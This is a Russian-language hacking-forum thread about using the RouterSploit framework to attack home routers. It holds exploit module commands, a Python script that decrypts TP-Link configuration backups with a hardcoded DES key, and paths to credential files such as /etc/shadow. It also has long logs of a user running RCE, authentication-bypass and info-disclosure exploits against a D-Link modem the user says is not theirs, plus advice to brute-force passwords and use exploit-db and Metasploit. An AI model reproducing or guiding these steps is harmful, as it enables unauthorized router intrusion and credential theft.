RouterSploit

Киньте линк на морду в личку, попытаюсь подробно изучить его.

Я уже устал играться картинками пускай администраторы убирают костыли...

 

Это ложное срабатывание. На оба запроса роутер ответил страницей с авторизацией.

 

Скажите, а как пачу айпишников скормить?

 

Решился вопрос? У меня та же не заходит.

 

Окей гляну.

 

RouterSploit пусто..

 

А что делать если такое говорит, забивать каждый из тех эксплойтов вручную? Роутер Тп-линк WDR740

 

Да. По очереди.
use exploits/dlink/dsl_2740r_dns_change
set target
exploit

 

Отчасти...

Натолкнул ФуйВуй из темы -

Пробуем слить бэкап от ломаного\своего роутера.
Дальше под линём пытаемся его дешифровать.

Code:

apt-get install python-crypto

готовим скрипт

Code:

#!/usr/bin/python
#
from Crypto.Cipher import DES
from hashlib import md5
#
key = '\x47\x8D\xA5\x0B\xF9\xE3\xD2\xCF'
crypto = DES.new( key, DES.MODE_ECB )
#
data = open('config.bin', 'rb').read()
data_decrypted = crypto.decrypt( data ).rstrip('\0')
assert data_decrypted[:16] == md5(data_decrypted[16:]).digest()
open('config.bin.txt', 'wb').write(data_decrypted[16:])

Сохраняем скрипт и даём право на запуск.
Кидаем бэкап в одну папку со скриптом.
Запускаем скрипт.


Источник - http://zftlab.org/pages/2014021700.html
http://teknoraver.net/software/hacks/tplink/

Пути к пасам:
ОпенВРТ
/etc/config/system - учетные данные от вебки
/etc/shadow - учетные данные от телнет/ssh

DD-WRT
1. Скачиваем бэкап и открываем с помощью блокнота, все данные без шифрования в текстовом виде.
2.Пути к файлам

 

Здравствуйте! Возникла необходимость восстановить утерянные логин и пароль доступа к веб-интерфейсу модема D-Link DSL-2750U. Сброс настроек рассматривается как крайний вариант. Попробовал RouterSploit 2.2.1. Установил ее единоразово (т.е. до первой перезагрузки) в среду Live USB Kali Linux 2017.3. Проверка на уязвимость ко всем эксплойтам командой use scanners/autopwn выдала некоторые положительные на первый взгляд результаты.

Стал по очереди проверять все. Часть уязвимостей, как следует из их названия (dns change), прописывают DNS от Google в настройках модема, т.е. не рассчитаны на решение моей проблемы. Но для полноты картины попробовал запускать и эти 4 эксплойта. Лог у них получился абсолютно одинаковым.

Spoiler: exploits_dns_change

exploits/routers/shuttle/915wm_dns_change
exploits/routers/dlink/dsl_2740r_dns_change
exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
exploits/routers/dlink/dsl_2640b_dns_change

[*] Running module...
[*] Attempting to change DNS settings...
[*] Primary DNS: 8.8.8.8
[*] Secondary DNS: 8.8.4.4
[-] Could not change DNS settings

Это означает, что роутер просто не подвержен этим уязвимостям?

Все остальные эксплойты (или почти все) уже ориентированы на работу с авторизацией. Проверка работы каждого из них не дала положительных результатов. Прилагаю их логи запуска.

Spoiler: exploits/routers/netgear/dgn2200_dnslookup_cgi_rce

rsf > use exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
rsf (Netgear DGN2200 RCE) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target address e.g. http://192.168.1.1
port 80 Target Port


Module options:

Name Current settings Description
---- ---------------- -----------
username admin Username
password password Password


rsf (Netgear DGN2200 RCE) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (Netgear DGN2200 RCE) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target http://192.168.1.1 Target address e.g. http://192.168.1.1
port 80 Target Port


Module options:

Name Current settings Description
---- ---------------- -----------
username admin Username
password password Password


rsf (Netgear DGN2200 RCE) > run
[*] Running module...
[*] It is not possible to check if target is vulnerable
[*] Trying to invoke command loop...
[*] It is blind command injection. Response is not available.

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] Depending on the vulnerability, command's results might not be available.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > exit
rsf (Netgear DGN2200 RCE) > back

Spoiler: exploits/routers/dlink/dir_815_850l_rce

rsf > use exploits/routers/dlink/dir_815_850l_rce
rsf (D-Link DIR-815 & DIR-850L RCE) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target IP address e.g. 192.168.1.1


rsf (D-Link DIR-815 & DIR-850L RCE) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (D-Link DIR-815 & DIR-850L RCE) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target 192.168.1.1 Target IP address e.g. 192.168.1.1


rsf (D-Link DIR-815 & DIR-850L RCE) > run
[*] Running module...
[*] It's not possible to check if the target is vulnerable. Try to use following command loop.
[*] Invoking command loop...
[*] It is blind command injection, response is not available

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] Depending on the vulnerability, command's results might not be available.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > exit
rsf (D-Link DIR-815 & DIR-850L RCE) > back

Spoiler: exploits/routers/cisco/secure_acs_bypass

rsf > use exploits/routers/cisco/secure_acs_bypass
rsf (Cisco Secure ACS Unauthorized Password Change) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target IP address
port 443 Target Port


Module options:

Name Current settings Description
---- ---------------- -----------
username Username to use
path /PI/services/UCP/ Path to UCP WebService
password Password to use


rsf (Cisco Secure ACS Unauthorized Password Change) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (Cisco Secure ACS Unauthorized Password Change) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target http://192.168.1.1 Target IP address
port 443 Target Port


Module options:

Name Current settings Description
---- ---------------- -----------
username Username to use
path /PI/services/UCP/ Path to UCP WebService
password Password to use


rsf (Cisco Secure ACS Unauthorized Password Change) > run
[*] Running module...
[*] Issuing password change request for:
[-] Connection error: http://192.168.1.1:443/PI/services/UCP/
[-] Exploit failed. Target seems to be not vulnerable.
rsf (Cisco Secure ACS Unauthorized Password Change) > back

P.S. Здесь, как я понял, скорее всего эксплойт просто не подходит для этого роутера.

Spoiler: exploits/routers/cisco/catalyst_2960_rocem

rsf > use exploits/routers/cisco/catalyst_2960_rocem
rsf (Cisco Catalyst 2960 ROCEM RCE) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target IP address


Module options:

Name Current settings Description
---- ---------------- -----------
device -1 Target device - use "show devices"
telnet_port 23 Target Port
action set set / unset credless authentication for Telnet service


rsf (Cisco Catalyst 2960 ROCEM RCE) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (Cisco Catalyst 2960 ROCEM RCE) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target 192.168.1.1 Target IP address


Module options:

Name Current settings Description
---- ---------------- -----------
device -1 Target device - use "show devices"
telnet_port 23 Target Port
action set set / unset credless authentication for Telnet service


rsf (Cisco Catalyst 2960 ROCEM RCE) > run
[*] Running module...
[-] Set target device - use "show devices" and "set device <id>"
rsf (Cisco Catalyst 2960 ROCEM RCE) > back

Spoiler: exploits/routers/billion/5200w_rce

rsf > use exploits/routers/billion/5200w_rce
rsf (Billion 5200W-T RCE) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target address e.g. http://192.168.1.1
port 80 Target port


Module options:

Name Current settings Description
---- ---------------- -----------
username admin Default username to log in
telnet_port 9999 Telnet port used for exploitation
password password Default password to log in


rsf (Billion 5200W-T RCE) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (Billion 5200W-T RCE) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target http://192.168.1.1 Target address e.g. http://192.168.1.1
port 80 Target port


Module options:

Name Current settings Description
---- ---------------- -----------
username admin Default username to log in
telnet_port 9999 Telnet port used for exploitation
password password Default password to log in


rsf (Billion 5200W-T RCE) > run
[*] Running module...
[*] Trying to exploit first command injection vulnerability...
[-] Exploitation failed for unauthenticated command injection
[*] Trying authenticated commad injection vulnerability...
[*] Trying exploitation with creds: adminassword
[*] Trying exploitation with creds: true:true
[*] Trying exploitation with creds: user3:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678
[*] Trying to connect to the telnet server...
[-] Exploit failed - Telnet connection error: 192.168.1.1:9999
rsf (Billion 5200W-T RCE) > back

И последний лог от эксплойта, которому программа поставила положительный (не сомнительный) результат в плане уязвимости.

Spoiler: exploits/routers/3com/3cradsl72_info_disclosure

rsf > use exploits/routers/3com/3cradsl72_info_disclosure
rsf (3Com 3CRADSL72 Info Disclosure) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target address e.g. http://192.168.1.1
port 80 Target port


rsf (3Com 3CRADSL72 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (3Com 3CRADSL72 Info Disclosure) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target http://192.168.1.1 Target address e.g. http://192.168.1.1
port 80 Target port


rsf (3Com 3CRADSL72 Info Disclosure) > run
[*] Running module...
[*] Sending request to download sensitive information
[+] Exploit success
[*] Reading /app_sta.stm file
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>DSL-2750U</title>
<meta name="date" content="" />
<meta name="generator" content="no generator" />
<meta name="copyright" content="Copyright (C) 2011 D-Link Russia" />
<meta name="keywords" content="DSL-2750U" />
<meta name="description" content="DSL-2750U" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="content-style-type" content="text/css" />
<meta http-equiv="content-script-type" content="text/javascript" />
<link type="image/x-icon" rel="shortcut icon" href="/favicon.ico" />
<link type="text/css" rel="stylesheet" href="dlink.css?id=1639683028" />
<link type="text/css" rel="stylesheet" href="/css/login.css?id=1639683028" />
<link type="text/css" rel="stylesheet" href="/css/common.css?id=1639683028" />
<!--[if lt IE 8]>
<link type="text/css" rel="stylesheet" href="/css/ie6.css?id=1639683028" />
<![endif]-->
<script type="text/javascript" src="/scripts/jquery.js?id=1639683028"></script>
<script type="text/javascript" src="/scripts/jquery.json.js?id=1639683028"></script>
<script type="text/javascript" src="/scripts/dlink.js?id=1639683028"></script>
<script type="text/javascript" src="/scripts/login.ui.js?id=1639683028"></script>
<script type="text/javascript" src="/scripts/jhmvc.js?id=1639683028"></script>
<script type="text/javascript" src="/scripts/device.js?id=1639683028"></script>
<script type="text/javascript" src="/scripts/sm_params.js?id=1639683028"></script>

<script type="text/javascript" src="/scripts/common1.js?id=1639683028"></script>
<script type="text/javascript" src="/scripts/common2.js?id=1639683028"></script>
<script type="text/javascript" src="/scripts/login.js?id=1639683028"></script>
<script type="text/javascript" src="/scripts/eng.lng.js?id=1639683028"></script>
<script>var baselang = new Object(lang);</script>
<script type="text/javascript" src="/scripts/rus.lng.js"></script>
<script type="text/javascript" src="/scripts/config.lng.js?id=1639683028"></script>
<script>
var badAuthKey = "";
window.curlang = "rus";
window.encrypt_pass = "0";
$(document).bind('ready', function(){
setTimeout(function(){
deleteCookie("salt");
}, 4200000);
start();
});
GLOBAL_VAR("rpcWAN")();
if(window.ttnetRedirect) ttnetRedirect();
if(window.httpIntercept) httpIntercept();
</script>
</head>
<body>
<div id='wrapperWorkspace'>
<div id='workspace'>
<div id='wrapperHeader'>
<div id='miscBlocks' class='unselectable'>
<div id='blockLogo'>
<img src='/image/dlink_logo.gif' />
</div>
<div id='blockVersion'>
<span id='v_model'></span> <span id='v_proxy'>DSL-2750U</span><br /><span id='v_firmware'></span>&nbsp; 2.0.17<br /><span id='v_lang'></span>
</div>
<div id='blockFastmenu'></div>
<div class='clear'></div>
</div>
</div>
<div id='wrapperContent'>
<div id='errorMsg' class='unselectable' unselectable="on"></div>
<div id='authWindow' class='window' style='box-shadow: 0 0 30px #555; -moz-box-shadow: 0 0 30px #555; -webkit-box-shadow: 0 0 30px #555;'>
<div class='windowCaption unselectable'>
<div class='windowTitle' unselectable="on"></div>
<div class='windowPreloader' id='preloader'><img src='' /></div>
<div class='clear'></div>
</div>
<div class='windowContent'>
<form id="id_form_main" method="post" enctype="application/x-www-form-urlencoded" action="index.cgi">
<input type="hidden" name="v2" value="y"/>
<input type="hidden" name="rs_type" value="html"/>
<input type="hidden" name="client_login" value=""/>
<input type="hidden" name="client_password" value=""/>
<input id="auth" name="auth" type="hidden" value="auth" />
<div class='inputer spacer normal'>
<div class='top unselectable'>
<div class='title' unselectable="on"></div>
<div class='caps' unselectable="on">[Caps Lock]</div>
<div class='clear'></div>
</div>
<div class='bottom'>
<div class='data'>
<input type='text' id='A1' maxlength='31' />
</div>
<div class='clear'></div>
</div>
</div>
<div class='inputer normal'>
<div class='top unselectable'>
<div class='title' unselectable="on"></div>
<div class='caps' unselectable="on">[Caps Lock]</div>
<div class='clear'></div>
</div>
<div class='bottom'>
<div class='data'>
<input type='password' id='A2' maxlength='31' />
</div>
<div class='clear'></div>
</div>
</div>
</div>
</form>
<div class='windowAction unselectable'>
<a href='#'>ВÑ
од</a><a href='#'>Очистить</a>
</div>
</div>
</div>
</div>
</div>
</body>
</html>

[*] Sending request to download sensitive information
[-] Exploit failed - could not retrieve response
rsf (3Com 3CRADSL72 Info Disclosure) > back

Как я понимаю, ни один из этих эксплойтов не подходит для этого роутера? Или есть возможность с помощью какого-либо из них вытащить логин и пароль? Заранее благодарю за ответы!

 

1. Попробуйте сбрутить простеньким словарем.
2. Найти в интернете эксплоиты на данную модель (например на сайте - exploit-db.com)
3. Фреймворк metasploit также даёт возможность работы с роутерами посмотрите там.

 

Благодарю за помощь! По первому пункту: имеется ввиду подбор по стандартным и распространенным паролям?

Про эксплойты говорили в соседней теме (Router Scan): выяснилось, что под мою модификацию этой модели - со встроенной антенной - нет эксплойтов. Много эксплойтов под более старый вариант - с внешней антенной. Один из таких эксплойтов (по всей видимости) проверял на своей модели - безуспешно:
http://xiaopan.co/forums/downloads/d-link-dsl-2750u-authentication-bypass-vulnerability.378/
http://www.routerpwn.com/D-Link/
https://forum.antichat.ru/threads/proga-router-scan.398971/page-275#post-4168904

Metasploit буду пробовать. Только пока не могу разобраться как его применить в моем случае, сложновато...

 

Самое оптимальное решение вам уже подсказали:

https://forum.antichat.ru/posts/4171642

 

Благодарю! Ответ я уже написал. Да, решение хорошее, но, с учетом того, что роутер не мой, я ограничусь попытками достать данные с помощью программ. Если ничего не получится, сделаю сброс настроек.

Посмотрел в сети документацию по этой программе и возник вопрос: для проверки роутера подойдет вариант автоматического сканирования связкой nmap + db_autopwn? Или это неоптимальный вариант в данном случае? Заранее благодарю!

 

Ну во первых в текущих версиях этот модуль удалили, а во вторых это не оптимальное решение. Проще вручную найти.

 

Спасибо! Да, про удаление модуля читал, но видел информацию, что его можно вернуть вручную. Хотя в данном случае это, конечно, уже неактуально. Буду разбираться как делать ручной подбор эксплойтов.

Я пробовал подбирать пароль через Router Scan (http) и X-Scan из пакета Intercepter-NG (http + telnet) с их встроенными словарями. Положительного результата добиться не удалось. Этого достаточно по первому пункту рекомендаций?

 

Думаю да.

 

Спасибо за ответ!

 

RouterSploit официально внесли в репозиторий Кали для его установки нужно ввести след. команды

Code:

apt-get update
apt-get install routersploit -y

 

привет. Кто может помочь с эксплоит

https://www.exploit-db.com/exploits/44284/

Не понимаю как его прикрутить к программе или как по другому запустить?

когда я его через Питон запускаю, то получаю:

Usage: ./StackClashROPsystem.py IP PORT binary shellcommand

Спасибо!